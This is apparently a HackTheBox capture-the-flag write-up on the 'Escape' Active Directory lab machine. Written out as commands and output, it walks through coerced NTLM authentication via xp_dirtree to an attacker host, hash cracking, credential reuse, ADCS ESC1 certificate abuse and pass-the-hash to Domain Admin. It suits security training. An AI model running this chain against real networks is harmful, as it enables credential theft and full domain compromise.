Mystic

Escape Writeup - HackTheBox

cheasyz
Feb 24, 2026

Difficulty: Medium (Windows)

Escape is a Medium-rated Windows Active Directory machine on HackTheBox. It involves exploiting an openly accessible SMB share to discover database credentials, coercing NTLM authentication through MSSQL to capture service account hashes, pivoting through leaked credentials in log files, and abusing a misconfigured Active Directory Certificate Services (ADCS) template to escalate to Domain Admin.

Reconnaissance

Nmap Scan

A full TCP port scan reveals a Windows Domain Controller running typical AD services along with MSSQL and WinRM.

nmap -sCV -p- 10.129.6.224

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49669/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
49713/tcp open  msrpc         Microsoft Windows RPC
49735/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows

Key observations:

  • Domain: sequel.htb with DC hostname dc.sequel.htb
  • Certificate Authority: sequel-DC-CA (visible in SSL cert issuer — important for later)
  • WinRM on port 5985 — useful for remote shell access
  • Clock skew: +8h00m00s from scanner time

SMB Enumeration

Anonymous access is allowed on the Public share, which contains a PDF with onboarding instructions.

smbclient //10.129.6.224/Public -U 'anonymous'

smb: \> dir
  .                                   D        0  Sat Nov 19 12:51:25 2022
  ..                                  D        0  Sat Nov 19 12:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 14:39:43 2022

smb: \> get "SQL Server Procedures.pdf"

The PDF contains MSSQL credentials for new hires:

User: PublicUser Password: GuestUserCantWrite1 Authentication: SQL Server Authentication

Initial Foothold

MSSQL Enumeration

Connecting to the MSSQL instance with the discovered credentials:

impacket-mssqlclient [email protected] -p 'GuestUserCantWrite1'

Enumeration reveals limited privileges — no xp_cmdshell, no impersonation, no exploitable linked servers:

SQL (PublicUser  guest@master)> enum_db
name     is_trustworthy_on
------   -----------------
master                   0
tempdb                   0
model                    0
msdb                     1

SQL (PublicUser  guest@master)> xp_cmdshell
ERROR: The EXECUTE permission was denied on the object 'xp_cmdshell'

SQL (PublicUser  guest@master)> enum_impersonate
execute as   database   permission_name   state_desc   grantee   grantor
----------   --------   ---------------   ----------   -------   -------

However, xp_dirtree is available, which allows coercing NTLM authentication.

NTLM Hash Capture via xp_dirtree

Start Responder on the attacker machine to capture the authentication attempt:

sudo responder -I tun0

Force the MSSQL service to authenticate to the attacker:

xp_dirtree \\10.10.15.45\share

Responder captures the NTLMv2 hash for the sql_svc service account:

sql_svc::sequel:78c5ef5996976067:7F52358E3B71CDB78CE132AB4B53EB91:0101000000000000...

Cracking the Hash

hashcat -m 5600 sql_svc.hash rockyou.txt

Result: sql_svc:REGGIE1234ronnie

Shell as sql_svc

evil-winrm -i sequel.htb -u sql_svc -p REGGIE1234ronnie

No user flag in sql_svc's directories — the flag belongs to Ryan.Cooper.

Lateral Movement

Credential Discovery in MSSQL Error Logs

Checking the MSSQL error log backup reveals a failed login attempt where Ryan.Cooper accidentally typed their password as the username:

type C:\SQLServer\Logs\ERRORLOG.bak

2022-11-18 13:43:07.44 Logon  Logon failed for user 'sequel.htb\Ryan.Cooper'. 
    Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon  Logon failed for user 'NuclearMosquito3'. 
    Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]

The second failed login shows Ryan.Cooper entered their password NuclearMosquito3 as the username.

Shell as Ryan.Cooper

evil-winrm -i sequel.htb -u ryan.cooper -p NuclearMosquito3

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> type user.txt
a496dbca697c90710dd196fbc706xxxx

Privilege Escalation

ADCS Enumeration — ESC1

Recall from reconnaissance that the SSL certificate issuer was sequel-DC-CA. This hints at Active Directory Certificate Services. Using Certipy to enumerate vulnerable templates:

certipy-ad find -u [email protected] -p NuclearMosquito3 -dc-ip 10.129.6.224 -vulnerable

A vulnerable template UserAuthentication is found with the ESC1 misconfiguration:

[!] Vulnerable Certificates Templates :
    CA Name               : dc.sequel.htb\sequel-DC-CA
    Template Name         : UserAuthentication
    msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
    Enrollment Rights     : sequel\Domain Users

The critical conditions for ESC1 are met:

  • ENROLLEE_SUPPLIES_SUBJECT — the requester can specify any Subject Alternative Name (SAN)
  • Domain Users have enrollment rights — Ryan.Cooper can request certificates
  • Client Authentication EKU — the certificate can be used for authentication

Exploiting ESC1

Request a certificate as Administrator by specifying the UPN in the SAN:

certipy-ad req -u [email protected] -p NuclearMosquito3 \
  -ca sequel-DC-CA \
  -template UserAuthentication \
  -upn [email protected] \
  -dc-ip 10.129.6.224

This produces administrator.pfx.

Authentication with Certificate

Before authenticating, the system clock must be synced with the DC to avoid Kerberos clock skew errors:

sudo timedatectl set-ntp false
sudo ntpdate 10.129.6.224

Authenticate using the certificate to retrieve the Administrator's NT hash:

certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.6.224

[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

Shell as Administrator

Pass-the-hash with the NT hash (second half only):

evil-winrm -i sequel.htb -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
a5e74248ddd03b579b8519bec696xxxx

Flags

FlagHash
Usera496dbca697c90710dd196fbc706xxxx
Roota5e74248ddd03b579b8519bec696xxxx

Attack Path Summary

Nmap → AD Domain Controller (sequel.htb), SMB, MSSQL, WinRM, ADCS (sequel-DC-CA)
  → SMB anonymous access → Public share → "SQL Server Procedures.pdf"
    → MSSQL creds: PublicUser / GuestUserCantWrite1
      → xp_dirtree UNC path → Responder captures NTLMv2 hash (sql_svc)
        → hashcat → REGGIE1234ronnie → WinRM as sql_svc
          → ERRORLOG.bak leaks Ryan.Cooper's password: NuclearMosquito3
            → WinRM as Ryan.Cooper → user.txt
              → ADCS ESC1 (UserAuthentication template, ENROLLEE_SUPPLIES_SUBJECT)
                → certipy-ad req as Administrator → PFX → NT hash via PKINIT
                  → Pass-the-Hash → WinRM as Administrator → root.txt